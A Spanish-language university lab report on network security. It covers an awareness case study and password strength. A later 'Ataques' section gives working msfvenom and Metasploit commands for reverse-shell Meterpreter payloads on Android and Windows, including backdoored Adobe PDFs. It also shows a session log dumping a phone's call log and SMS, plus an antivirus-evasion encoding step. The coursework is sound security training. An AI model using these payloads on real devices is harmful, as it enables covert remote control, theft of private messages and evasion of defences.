

UNPSJB

LICENCIATURA EN SISTEMAS OPGCPI

ADMINISTRACIÓN DE REDES Y SEGURIDAD

Trabajo Práctico 1

Concientización - Seguridad física - Ataques

Cátedra

Lic. Bruno Damián Zappellini

Integrantes:

Luciano Serruya Aloisi

28 de septiembre de 2018



Índice

1. Caso de estudio	2
1.1. Situaciones de inseguridad identificadas	2
1.2. Fallas evidenciadas	3
1.3. Medidas de seguridad	4
2. Análisis del video “Escritorio limpio”	4
3. Claves	5
3.1. Análisis de contraseñas	5
3.2. Vulnerabilidad en Internet	5
3.3. Medidas de seguridad personales	6
3.4. Acciones para la concientización	6
4. Seguridad física	6
5. Ataques	6
5.1. Android	6
5.2. Windows	8
5.3. <i>Meterpreter</i> en Windows y en Android	10
5.4. Analizando los archivos con <i>VirusTotal</i>	10
5.5. Evadir antivirus	13

1. Caso de estudio

1.1. Situaciones de inseguridad identificadas

Lo primero que se puede asumir leyendo el relato de *Un día en la oficina de Carlitos* es que el personaje no utiliza una contraseña muy segura para su computadora del trabajo (debido principalmente al largo de la misma). Acto seguido, el personaje se retira de su oficina dejando su computadora con una sesión iniciada, permitiendo que cualquiera que entre a su oficina pueda usarla como si fuese él (posible caso de *usurpación de identidad*).

Una vez que regresa a la oficina, se queja de toda la publicidad que le llega al mail (claro ejemplo de *SPAM*, y hasta se podría llegar a dar que entre alguno de esos mensajes haya alguno malintencionado). Seguidamente abre un mensaje *enviado con la cuenta* de José, su cuñado. Este mensaje contiene como adjunto un archivo ejecutable de Windows, diciendo que es una foto. Con respecto a esta situación, se pueden destacar varias cuestiones:

- El mensaje puede no haber sido enviado por el dueño de la cuenta. En caso de que algún dispositivo en el cual José tenga su cuenta de correo electrónico vinculada y haya sufrido el ataque de un *malware*, dicho mensaje puede no haber sido enviado por él, sino por el programa malicioso, haciendo que el mismo mensaje sea malintencionado.
- El mensaje se puede tratar de un *HOAX*, también. Con la excusa de que incluye una imagen cómica, los distintos remitente van enviando el mensaje a sus contactos y así manteniendo la cadena.
- El hecho de que una imagen tenga la extensión de un archivo ejecutable levanta muchas sospechas, induciendo a pensar que puede ser en sí un programa malicioso.

Después de la conversación con el Dr. Roberto Secchi narrada en el anexo, el personaje intenta desesperadamente conseguir el documento solicitado. Para ello prueba con varias contraseñas para así iniciar sesión en la computadora de una compañera de oficina (la cual no estaba presente ese día). Eso se trata de una grave violación a la privacidad de su compañera. Al no tener éxito, repite la situación con la computadora de otro compañero, logrando entrar debido a una contraseña muy débil y abiertamente conocida por sus pares.

Una vez que consiguió ingresar en la computadora, recupera el documento necesario y se lo envía al Dr. Secchi, saliendo así de un apuro.

1.2. Fallas evidenciadas

8:20

- a) Elección de contraseña insegura.
- b) Utilización de correo electrónico inseguro.
- c) Ingeniería Social
- d) a y c.

Respuesta: d).

9:47

- a) SPAM
- b) Adjunto de archivos ejecutables (photo.exe)
- c) HOAX
- d) a y b.

Respuesta: d).

9:57

- a) Elección de contraseña segura.
- b) Ingeniería Social.
- c) HOAX.
- d) a, b y c.

Respuesta: a).

10:00

- a) Usurpación de Identidad.
- b) Ingeniería Social.
- c) Elección de contraseña insegura.
- d) a, b y c

Respuesta: d).

1.3. Medidas de seguridad

Con respecto a una de las primeras situaciones identificadas (el personaje del relato deja su computadora con la sesión iniciada y se retira de la oficina), una posible solución sería que todas las computadoras de la oficina se bloqueen (cierren la sesión, requiriendo de nuevo la contraseña) dentro de un breve período de inactividad.

Para las situaciones en las que el personaje utilizó las computadoras de los compañeros, una solución podría ser establecer una política de seguridad la cual dictamine un *formato* a cumplir para las contraseñas (para generar contraseñas seguras), y que dichas contraseñas se vayan cambiando periódicamente.

2. Análisis del video “Escritorio limpio”

- No se toman medidas de seguridad física para almacenar documentos importantes. El *backup* del proyecto en el cual estaba trabajando el personaje es dejado encima del escritorio, más allá de haberle dicho a su superior que lo iba a guardar en una caja fuerte. Sobre el final del video se puede ver cómo la cámara de seguridad capturó a varias personas entrando a la oficina y aprovechándose de estos descuidos.
- Uso de contraseñas débiles, y mal manejo de las mismas. El personaje deja anotada su contraseña en su monitor, permitiendo que cualquier persona que entre a su oficina la conozca. Cabe destacar también que el personal de administración de redes y de seguridad de la oficina tiene acceso a su contraseña.

- El personaje es víctima de *Trashing*. Al final del video se ve cómo el personal de limpieza revisa en su basura y retira documentos que no fueron correctamente desechados (destruidos).
- Pérdida de copias de resguardo. El *backup* del proyecto es retirado de la oficina inadvertidamente.

3. Claves

El principal problema de proteger información con claves débiles es lo fácil que se pueden conseguir esas claves. Ya sea probando algunas combinaciones habituales (como “12345”, “admin”, la fecha de nacimiento de la persona, entre otros) o con herramientas que automatizan ese trabajo (ya sea con diccionarios o mediante fuerza bruta).

3.1. Análisis de contraseñas

Utilizando el sitio https://www.segu-info.com.ar/proteccion/fortaleza_clave.htm se obtuvieron los siguientes resultados:

- La contraseña admin tiene una puntuación de 7 %
- La contraseña ARyS la mejor materia! (utilizando espacios) logra una puntuación de 100 %

3.2. Vulnerabilidad en Internet

Ud como usuario de Internet, ¿cree que es vulnerable? En caso afirmativo, especifique por qué, y qué cree que podría hacer para minimizar los riesgos.

Uno siempre puede ser vulnerable mientras navega en Internet, principalmente cuando visita sitios cuyo *medio de comunicación* no es seguro (sitios que usan HTTP en vez de HTTPS). De esta forma se está expuesto a que la comunicación con el sitio sea interceptada y pueda verse perjudicado. Para paliar esta situación, los navegadores actuales indican cuándo se está visitando un sitio *no seguro*.

3.3. Medidas de seguridad personales

¿Qué procedimientos adopta en pos de la seguridad/privacidad?

Principalmente el uso de contraseñas seguras (compuestas tanto por caracteres mayúsculas y minúsculas, como por número y símbolos), también encriptación para las particiones del disco duro de la PC personal (partición encriptada con *LUKS*).

3.4. Acciones para la concientización

Una acción de concientización interesante podría ser la demostración de qué tan fácil puede llegar a ser descubrir una contraseña habitual, mediante el uso de diccionarios y/o fuerza bruta.

4. Seguridad física

Para evidenciar la realización de los laboratorios sobre seguridad física, tanto el de obtener los usuarios y contraseñas de un sistema Linux como de un Windows, se anexan los archivos “cracked_shadow.txt” y “cracked_windows.csv” dentro del directorio “assets”.

5. Ataques

5.1. Android

Explique el procedimiento para la ejecución del componente meterpreter en un dispositivo/computadora remota a través de msfvenom

Para poder ejecutar una aplicación con un *shell reverse* ¹ en un dispositivo Android, primero se debe crear un archivo *.apk* (archivo instalable en un Android) que contenga el código necesario para establecer la conexión con otra computadora. Para ello se usa el programa *msfvenom* de la siguiente manera:

```
1 msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP  
> LPORT=<PUERTO_DE_ESCUCHA> R> ~/app.apk
```

¹Se establece una conexión entre dos computadoras, la que inicia la conexión dirige una terminal interactiva hacia el destino [1]

- `-p android/meterpreter/reverse_tcp`: con este parámetro le indicamos a `msf-venom` que el *payload* (código adicional) que queremos inyectar en la aplicación *app.apk* realice una conexión TCP con la IP `<IP>` al puerto `<PUERTO_DE_ESCUCHA>`
- `LHOST`: dirección IP a la cual conectarse
- `LPORT`: puerto al cual establecer la conexión

Una vez instalada la aplicación en el dispositivo Android al cual se desea atacar, se debe ejecutar la consola de *Metasploit* (con el comando `msfconsole`), e ingresar lo siguiente:

- `use exploit/multi/handler`
- `set payload android/meterpreter/reverse_tcp`
- `set LHOST <IP>`
- `set LPORT <PUERTO_DE_ESCUCHA>`
- `exploit`


```

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(multi/handler) > set LPORT 12345
LPORT => 12345
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.5:12345
[*] Sending stage (70565 bytes) to 192.168.0.4
[*] Meterpreter session 1 opened (192.168.0.5:12345 -> 192.168.0.4:37259) at 2018-09-26 21:17:36 -0300
meterpreter > dump_callog
[*] Fetching 295 entries
[*] Call log saved to callog_dump_20180926211745.txt
meterpreter > dump_sms
[*] Fetching 112 sms messages
[*] SMS messages saved to: sms_dump_20180926211754.txt
meterpreter > send_sms -t "Hola jeje - enviado desde meterpreter" -d "2804628405"
[+] SMS sent - Transmission successful
meterpreter > send_sms -t "Hola jeje - enviado desde meterpreter" -d "2804505713"
[+] SMS sent - Transmission successful
meterpreter >

```

Figura 1: Conexión desde msf console a un dispositivo Android

Dentro del directorio “assets” se incluyen los archivos correspondientes a una recuperación del registro de llamadas, de mensajes de texto enviados y recibidos, y de la lista de contactos del dispositivo Android.

5.2. Windows

Basado en ejemplo anterior, como realizaría el mismo ataque contra un equipo Microsoft Windows. Puede utilizar un archivo PDF como vector de ataque

Dentro de la suite de programas de Adobe, uno de los más usado es su lector de PDFs, **Adobe Reader**. Este programa posee varias vulnerabilidades de las cuales uno se puede aprovechar para inyectar código malicioso en un archivo PDF. De las vulnerabilidades disponibles, a continuación se mostrará cómo explotar dos de ellas disponibles en Metasploit.

La primera de ellas, se trata de un *desbordamiento del buffer* (*buffer overflow*) de la pila de funciones de JavaScript con la función `util.printf()` [4]. Para inyectar el código en el archivo PDF se debe ejecutar los siguientes comandos en la consola de msf console:

- `use exploit/windows/fileformat/adobe_utilprintf`

- `set FILENAME <NOMBRE_DEL_ARCHIVO>.pdf`
- `set payload windows/meterpreter/reverse_tcp`
- `set LHOST <IP>`
- `set LPORT <PUERTO_DE_ESCUCHA>`
- `exploit`

Como se puede ver en los comandos, se está agregando un *payload* que establece una conexión TCP con una computadora que estará esperando tal conexión. De esta forma, al igual que con el ataque a un dispositivo Android, establecemos una *shell reversa*.

Una vez creado el archivo PDF y abierto en la máquina que será la víctima, se deben realizar los mismos pasos que en el ataque a Android para conectarse con el dispositivo, pero cambiando el *payload*

- `use exploit/multi/handler`
- `set payload windows/meterpreter/reverse_tcp`
- `set LHOST <IP>`
- `set LPORT <PUERTO_DE_ESCUCHA>`
- `exploit`

La segunda vulnerabilidad a experimentar se puede hallar en Metasploit como “Adobe PDF Embedded” [6]. Los pasos para inyectarla en un archivo PDF muy similares a los realizados con la anterior.

Primero, se debe armar el PDF. Para ello, se necesita un archivo PDF de entrada, al cual inyectarle el *payload*. Desde la consola de `msfconsole`, ejecutar los siguientes comandos:

- `use exploit/windows/fileformat/adobe_pdf_embedded_exe`
- `set payload windows/meterpreter/reverse_tcp`
- `set INFILENAME <ARCHIVO_ENTRADA.pdf>`
- `set FILENAME <ARCHIVO_SALIDA.pdf>`

- `set LHOST <IP>`
- `set LPORT <PUERTO_DE_ESCUCHA>`
- `exploit`

Creado el archivo, es cuestión de abrir en la máquina objetivo y configurar una máquina a la cual se conectará la primera (el procedimiento es el mismo a la vulnerabilidad anterior).

5.3. *Meterpreter* en Windows y en Android

¿Qué capacidades tiene Meterpreter en Windows que no están presentes en Android?

Desde la consola de *meterpreter* se puede ejecutar el comando `help` ó `?` para listar todos los comandos disponibles a ejecutar en el dispositivo objetivo - en el directorio “assets” se incluyen dos archivos (“*meterpreter_android.txt*” y “*meterpreter_windows.txt*”) con los distintos comandos disponibles para cada plataforma).

La principal diferencia que se puede ver examinando rápidamente la salida del comando de ayuda en cada plataforma es la posibilidad de gestionar procesos que se puede hacer en Windows pero no en Android; se pueden crear, eliminar (hasta se puede eliminar el proceso que tiene establecida la conexión). También permite ejecutar varios comandos a nivel de sistema, como puede ser recuperar variables de ambiente, obtener PIDs, reiniciar o apagar la computadora. Con respecto a la administración de redes, en la plataforma Windows se pueden examinar las conexiones abiertas con el comando `netstat`, el cual no está disponible para Android. También se puede poner a correr un *keylogger*², para obtener las secuencias de teclas pulsadas por el usuario.

Por último, se puede tomar una captura de pantalla del escritorio activo o cambiar parámetros del mismo.

5.4. Analizando los archivos con *VirusTotal*

A continuación se indica el comando que se utilizó para generar el archivo con el payload y la salida que se obtuvo al analizarlo con VirusTotal

```
1      msfvenom -p android/meterpreter/reverse_tcp LHOST  
      =192.168.0.5 LPORT=12345 -o ~/app.apk
```

²programas que realizan un seguimiento y registran cada tecla que se pulsa en una computadora [2]

Aplicación para Android

25 engines detected this file

SHA-256 537a6db049f5976c4f43cf2bc8cfa05fa6e68f9ff4338587e2302c6d714e9866
 File name app.apk
 File size 9.85 KB
 Last analysis 2018-09-29 04:35:37 UTC


25 / 61

Detection	Details	Relations	Community
Ad-Aware	Android.Riskware.Metasploit.D	AhnLab-V3	Android-PUP/Metasploit.d35d
Arcabit	Android.Riskware.Metasploit.D	Avast	Android:Metasploit-G [PUP]
Avast Mobile Security	Android:Metasploit-G [PUP]	AVG	Android:Metasploit-G [PUP]
Avira	ANDROID/Dldr.Agent.PAF.Gen	Babable	Malware.HighConfidence
BitDefender	Application.HackTool.MeterPreter.AQR	CAT-QuickHeal	Android.Agent.ACZ
DrWeb	Android.RemoteCode.67	Emsisoft	Application.HackTool.MeterPreter.AQR (B) a variant of
eScan	Application.HackTool.MeterPreter.AQR	ESET-NOD32	Android/TrojanDownloader.Agent.JN
F-Secure	Application.HackTool.MeterPreter	Fortinet	Riskware/Metasploit.B
GData	Android.Riskware.Metasploit.D	Ikarus	Trojan-Downloader.AndroidOS.Agent
K7GW	Trojan-Downloader (004ff8551)	Kaspersky	HEUR:HackTool.AndroidOS.Metasploit.e
MAX	malware (ai score=76)	Sophos AV	Android Metasploit (PUA)
Symantec Mobile Insight	Hacktool:Mesexploit	Tencent	HackTool.Android.Metasploit.awe
ZoneAlarm	HEUR:HackTool.AndroidOS.Metasploit.e	AegisLab	Clean

Figura 2: Salida de VirusTotal para la aplicación de Android

```
1 msfvenom -p windows/meterpreter/reverse_tcp --
  platform windows -a x86 -f exe LHOST=192.168.0.5
  LPORT=12345 -o ~/app.exe
```

Aplicación para Windows



48 engines detected this file

SHA-256: 1cdefd929a3994fc106d68d1d7e36dfb916d3a7d0ef273768cfa7c18ded85ff

File name: app.exe

File size: 72.07 KB

Last analysis: 2018-09-29 04:39:10 UTC

48 / 66

Detection

Details

Community

Ad-Aware	Trojan.CryptZ.Gen	AegisLab	Troj.W32.Gen.IB6I
AhnLab-V3	Trojan/Win32.Shell.R1283	ALYac	Trojan.CryptZ.Gen
Arcabit	Trojan.CryptZ.Gen	Avast	Win32:SwPatch [Wrm]
AVG	Win32:SwPatch [Wrm]	Avira	TR/Crypt.EPACK.Gen2
BitDefender	Trojan.CryptZ.Gen	Bkav	W32.FamVT.RorenNHc.Trojan
CAT-QuickHeal	Trojan.Swrort.A	ClamAV	Win.Trojan.MSShellcode-7
CrowdStrike Falcon	malicious_confidence_100% (D)	Cybereason	malicious.55c3dc
Cylance	Unsafe	Cyren	W32/Swrort.A.genIEldorado
DrWeb	Trojan.Swrort.1	Emsisoft	Trojan.CryptZ.Gen (B)
Endgame	malicious (high confidence)	eScan	Trojan.CryptZ.Gen
ESET-NOD32	a variant of Win32/Rozena.ED	F-Prot	W32/Swrort.A.genIEldorado
F-Secure	Trojan.CryptZ.Gen	Fortinet	W32/Swrort.Citr
GData	Trojan.CryptZ.Gen	Ikarus	Trojan.Win32.Swrort
K7AntiVirus	Trojan (004c49f81)	K7GW	Trojan (004c49f81)
Kaspersky	HEUR:Trojan.Win32.Generic	Malwarebytes	Trojan.Injector
MAX	malware (ai score=87)	McAfee	Swrort.I
McAfee-GW-Edition	BehavesLike.Win32.Swrort.lh	Microsoft	Trojan:Win32/Meterpreter.genIC
NANO-Antivirus	Trojan.Win32.Shellcode.ewfwj	Qihoo-360	HEUR/QVM20.1.2ED1.Malware.Gen
Rising	Malware.HeuristicIET#100% (RDM+cmRtazqLATt/VERExFsJZvZc...	Sophos AV	Mal/EncPk-TZ
Sophos ML	heuristic	SUPERAntiSpyware	Trojan.Backdoor-PoisonIvy
Symantec	Packed.Generic.347	TrendMicro	BKDR_SWRORT.SM
TrendMicro-HouseCall	BKDR_SWRORT.SM	VIPRE	Trojan.Win32.Swrort.B (v)
ViRobot	Trojan.Win32.Elzob.Gen	Webroot	Trojan:Win32/Swrort.A
Yandex	Trojan.Rozena.Gen.1	ZoneAlarm	HEUR:Trojan.Win32.Generic

Figura 3: Salida de VirusTotal para la aplicación de Windows

5.5. Evadir antivirus

¿Qué herramienta(s) provee metasploit para evadir la detección que se realizó en el punto 5?

Una herramienta que brinda el *framework* viene incluida (en las últimas versiones de *metasploit*) en la aplicación *msfvenom* - esta es la posibilidad de **codificar la firma del virus**.

Una de las técnicas que implementan los antivirus para reconocer archivos maliciosos es el reconocimiento de sus "firmas". Mayormente, verifican las primeras líneas del archivo en busca de algún patrón ya conocido de un cierto tipo de virus. Así que una forma sencilla de sortear los antivirus consiste en cambiar la codificación del archivo (sin cambiar su funcionalidad) para que no pase desapercibido [5].

Para replicar el virus de Windows anterior pero con la firma codificada, se debe ejecutar el siguiente comando:

```
1 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b "\x00" -i 50 --platform windows -a x86 -f exe LHOST=<IP> LPORT=<PUERT\_DE\_ESCUCHA> -o indetectable.exe
```

En este caso, la codificación utilizada es la "Shikata Ga Nai" (que se puede traducir al español como "No se puede hacer nada al respecto" [5]) - transforma la firma del *payload* haciendo operaciones XOR acumulativas sobre la misma. No es perfecta, pero es eficiente y genera varias firmas rápidamente que luego pueden ser descryptadas al momento de ejecutarse en la máquina objetivo. En el ejemplo de ejecución, la operación XOR se realiza 50 veces.

Probando el nuevo archivo en VirusTotal, lamentablemente no se logró ninguna mejora, la cantidad de antivirus que reconocen el archivo como una amenaza sigue siendo la misma.

Otra herramienta disponible para encriptar el *payload* del virus y así ser menos reconocible, es VENOM [3]. Esta herramienta se vale del programa *msfvenom* para generar *shellcode* en distintos formatos (como puede ser en C, Python, Ruby), y luego inyectarlo en una función de alguno de los lenguajes de programación (en un archivo "plantilla")

Referencias

- [1] Mike Fettis. *Reverse shell !?! Ago. de 2017*. URL: <https://hackernoon.com/reverse-shell-cf154df6ee6bd>.
- [2] Kaspersky. *¿Qué es un keylogger? 2018*. URL: <https://latam.kaspersky.com/resource-center/definitions/keylogger>.
- [3] BALAJI N. *Bypass an Anti Virus Detection with Encrypted Payloads using VENOM Tool. Jul. de 2018*. URL: <https://gbhackers.com/bypass-antivirus-using-payload/>.
- [4] Offensive Security. *Client Side Exploits in Metasploit. 2018*. URL: <https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/>.
- [5] Null-Byte. Wonder How to. *How to Change the Signature of Metasploit Payloads to Evade Antivirus Detection. Abr. de 2014*. URL: <https://null-byte.wonderhowto.com/how-to/hack-like-pro-change-signature-metasploit-payloads-evade-antivirus-detection-0149867/>.
- [6] Null-Byte. Wonder How to. *How to Embed a Backdoor Connection in an Innocent-Looking PDF. Ene. de 2014*. URL: <https://null-byte.wonderhowto.com/how-to/hack-like-pro-embed-backdoor-connection-innocent-looking-pdf-0140942/>.